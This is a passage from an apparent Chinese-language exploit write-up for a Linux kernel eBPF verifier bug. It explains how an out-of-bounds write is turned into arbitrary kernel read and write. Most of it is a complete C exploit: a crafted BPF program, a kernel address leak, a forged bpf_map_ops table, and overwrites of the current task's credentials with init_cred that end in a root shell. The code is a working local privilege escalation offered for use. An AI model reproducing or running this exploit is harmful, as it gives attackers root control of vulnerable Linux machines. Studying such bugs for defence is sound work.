		return -EBADFD;

	if (f.file->f_op == &bpf_prog_fops)
		err = bpf_prog_get_info_by_fd(f.file, f.file->private_data, attr,
					      uattr);
	else if (f.file->f_op == &bpf_map_fops)
		err = bpf_map_get_info_by_fd(f.file, f.file->private_data, attr,
					     uattr);

所以我们可以通过越界写控制 btf 指针完成任意地址读，但是注意每次只能读 4 字节。

这里我们利用任意读遍历 init_task 的 tasks 链表，以 comm 为 tag 进行遍历，从而找到 current_task

越界写实现任意写

注意到 array map 的 map_get_next_key() 定义如下，当 key 小于 map.max_entries 时 key 会被写入到 next_key 当中：

/* Called from syscall */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = key ? *(u32 *)key : U32_MAX;
	u32 *next = (u32 *)next_key;

	if (index >= array->map.max_entries) {
		*next = 0;
		return 0;
	}

	if (index == array->map.max_entries - 1)
		return -ENOENT;

	*next = index + 1;
	return 0;
}

当然对于常规的调用 map_get_next_key() 的流程而言虽然 key 的内容是可控的但是 next_key 指针不是我们所能控制的：

static int map_get_next_key(union bpf_attr *attr)
{
	//...
	next_key = kmalloc(map->key_size, GFP_USER);
	//...

	rcu_read_lock();
	err = map->ops->map_get_next_key(map, key, next_key);

但是在 map ops 当中有一些函数可以让我们控制这两个参数，我们可以将这样的函数指针替换为 map_get_next_key() 从而完成任意地址写，例如 map_push_elem() ：

struct bpf_map_ops {
	//...
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);

当我们更新 eBPF map 时，若 map 类型为 BPF_MAP_TYPE_QUEUE 或 BPF_MAP_TYPE_STACK ，则这个函数会被调用：

static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,
				void *value, __u64 flags)
{
	//...
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		err = map->ops->map_push_elem(map, value, flags);

那么这个 fake_ops 伪造在哪里呢？开启 smap 的情况下，我们只能伪造在内核空间。还记得之前泄漏的 map_addr 吗？我们知道 value_addr = map_addr + 0x110，而 value 中的值用户是可控的，其地址又是知道的，所以 fake_ops 自然就伪造在 value 中了，而 map_type 也是可以直接通过越界写进行修改。注意这里也是只能写 4 字节，并且还要绕过如下限制：

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = key ? *(u32 *)key : U32_MAX;
	u32 *next = (u32 *)next_key;

	if (index >= array->map.max_entries) {
		*next = 0;
		return 0;
	}

	if (index == array->map.max_entries - 1)
		return -ENOENT;

	*next = index + 1;
	return 0;
}

这里利用越界写直接修改 max_entries = 0xffffffff。

最后提权时，我直接修改的 current_task 的 cred/real_cred 为 init_cred，但是这里需要注意的是 init_cred 的高 8 字节恒为 0xffffffff，这是无法写入的，因为其满足 index == array->map.max_entries - 1。但是我们可以通过错为写绕过，因为普通用户的 cred/real_cred 是在堆上分配的，其高 4 字节恒为 0xffff，所以我们其实只需要覆盖低 6 字节即可

exp 即效果演示

exp 如下：

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"


void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
        };
        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .next_key = (uint64_t)next_key,
        };
        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff8226d900;
uint64_t init_cred = 0xffffffff82893a00; // D init_cred
uint64_t init_task = 0xffffffff82816080; // D init_task
uint64_t init_nsproxy = 0xffffffff82893720; // D init_nsproxy
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;

struct bpf_insn prog[] = {

        BPF_LD_MAP_FD(BPF_REG_1, 3),    // r1 = [map_fd] = bpf_map ptr1
        BPF_MOV64_IMM(BPF_REG_6, 0),    // r6 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),                            // r9 = r0 = value_buf1 ptr
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0),                   // r6 = *(uint64_t*)r9 = value_buf1[0] = 2
        BPF_MOV64_IMM(BPF_REG_0, 0),                                    // r0 = 0
        BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1),                          // if r6 >= 1 goto pc+1 ==> inc reg6.umin_value
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_IMM(BPF_REG_8, 1),                                    // r8 = 1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),                          // r8 = r8 << 32 = 1 << 32 = 0x1 0000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1),                           // r8 = r8 + 1 = 0x1 0000 0001
        BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),                  // if r6 <= r8 goto pc+1 ==> set reg6.umax_value = 0x1 0000 0001
        BPF_EXIT_INSN(),                                                // exit
//      BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),                        // if r6 != 1 goto pc+1 ==> trigger bug
//      BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),                                                // exit

        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),                           // r6 = r6 & 2 = 2 & 2 = 2
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),                           // r6 = r6 >> 1 = 2 >> 1 = 1
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),                       // r6 = r6 * 0x110 = 1 * 0x110 = 0x110

        BPF_LD_MAP_FD(BPF_REG_1, 4),                                    // r1 = [expmap_fd] = bpf_map ptr2
        BPF_MOV64_IMM(BPF_REG_8, 0),                                    // r8 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),                 // *(uint64_t*)(fp - 8) = r8 = 0
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),                           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),                          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),                            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),                            // r7 = r0 = value_buf2 addr
        BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),                   // r7 = r7 - r6 = value_buf2 addr - 0x110
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),                   // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops

        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18),                // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),                            // r2 = r8 = array_map_ops

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0),                // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20),                // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8),                   // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1),                          // if arb_read addr == NULL goto pc+1
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40),                // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10),                // r8 = value_buf1[2] = fake_ops
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4),                          // if arb_write flag == 0 goto pc+4
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                   // expmap's bpf_map_ops = r8 = fake_ops
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK),         // map_type = BPF_MAP_TYPE_STACK
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1),                         // max_entries = -1
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0),                          // spin_lock_off = 0
        BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
        BPF_EXIT_INSN(),
};

#define BPF_LOG_SZ 0x10000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 1,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};


void init() {
        setbuf(stdin, NULL);
        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
}

void trigger() {
        char buffer[64];
        write(sockets[0], buffer, sizeof(buffer));
}

void prep() {

        value1 = (uint64_t*)calloc(0x1000, 1);
        value2 = (uint64_t*)calloc(0x1000, 1);
        prctl(PR_SET_NAME, "XiaozaYa");

        map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
        if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
        if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        prog_fd = bpf(BPF_PROG_LOAD, &attr);
        if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
                perror("socketpair()"), err_exit("socketpair()");

        if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
                perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}

uint32_t arb_read_4_byte(uint64_t addr) {
        value1[0] = 2;
        value1[1] = addr - 0x58;
        value1[2] = 0;
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();
        return bpf_map_get_info_by_fd(expmap_fd);
}

uint64_t arb_read(uint64_t addr) {
        uint64_t lo = arb_read_4_byte(addr);
        uint64_t hi = arb_read_4_byte(addr+4);
        return (hi << 32) | lo;
}

void prep_arb_write() {

        uint64_t buf[0x200/8] = { 0 };
        value1[0] = 2;
        value1[1] = 0;
        value1[2] = map_addr+0x110+0x20;

        uint64_t fake_ops[] = {
                0x0,0x0,0x0,0x0,
                0xffffffff812677b0,
                0xffffffff81268830,
                0x0,
                0xffffffff81267df0,
                0xffffffff812678a0,
                0x0,0x0,
                0xffffffff8124a150,
                0x0,
                0xffffffff81249f20,
                0x0,
                0xffffffff81267930,
                0xffffffff81267c70,
                0xffffffff81267780,
                0xffffffff812678a0,
                0x0,0x0,0x0,0x0,
                0xffffffff81268340,
                0x0,
                0xffffffff81267a10,
                0xffffffff81268640,
                0x0,0x0,0x0,
                0xffffffff81267830,
                0xffffffff81267860,
                0xffffffff812679d0
        };

        for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
                if (fake_ops[i]) fake_ops[i] += koffset;
        }

        memcpy(value2, fake_ops, sizeof(fake_ops));
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);

        trigger();
}

void arb_write_4_byte(uint64_t addr, uint32_t val) {

        value2[0] = val - 1;
        bpf_map_update_elem(expmap_fd, &key, value2, addr);
}

void arb_write(uint64_t addr, uint64_t val) {
        arb_write_4_byte(addr, val&0xffffffff);
        arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}

void leak() {

        uint64_t buf[0x200/8] = { 0 };
        value1[0] = 2;
        value1[1] = 0;
        value1[2] = 0;
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();
        memset(buf, 0, sizeof(buf));
        bpf_map_lookup_elem(map_fd, &key, buf);
//      binary_dump("LEAK DATA", buf, 0x100);
        if ((buf[3] & 0xffffffff00000fff) == 0xffffffff00000900) {
                koffset = buf[3] - array_map_ops;
                kbase = 0xffffffff81000000 + koffset;
                map_addr = buf[4] - 0xc0;
                hexx("koffset", koffset);
                hexx("kbase", kbase);
                hexx("map_addr", map_addr);
        }

        if (koffset == -1) err_exit("FAILED to leak kernel base");
        array_map_ops += koffset;
        init_cred += koffset;
        init_task += koffset;
        init_nsproxy += koffset;
        hexx("init_cred", init_cred);
        hexx("init_task", init_task);
        hexx("init_nsproxy", init_nsproxy);

        current_task = init_task;
        for (;;) {
                if (arb_read(current_task+0xa58) == tag) {
                        break;
                }
                current_task = arb_read(current_task + 0x7a8) - 0x7a0;
        }
        hexx("current_task", current_task);
}

int main(int argc, char** argv, char** envp)
{

        init();
        prep();
        leak();
        prep_arb_write();

        // cred: 0xa48 real_cred: 0xa40 nsproxy: 0xaa8

        arb_write_4_byte(current_task+0xa48, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xa48+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xa40, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xa40+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xaa8, init_nsproxy&0xffffffff);
        arb_write_4_byte(current_task+0xaa8+2, (init_nsproxy>>16)&0xffffffff);
        get_root_shell();

//      puts(bpf_log_buf);
        puts("EXP NERVER END!");
        return 0;
}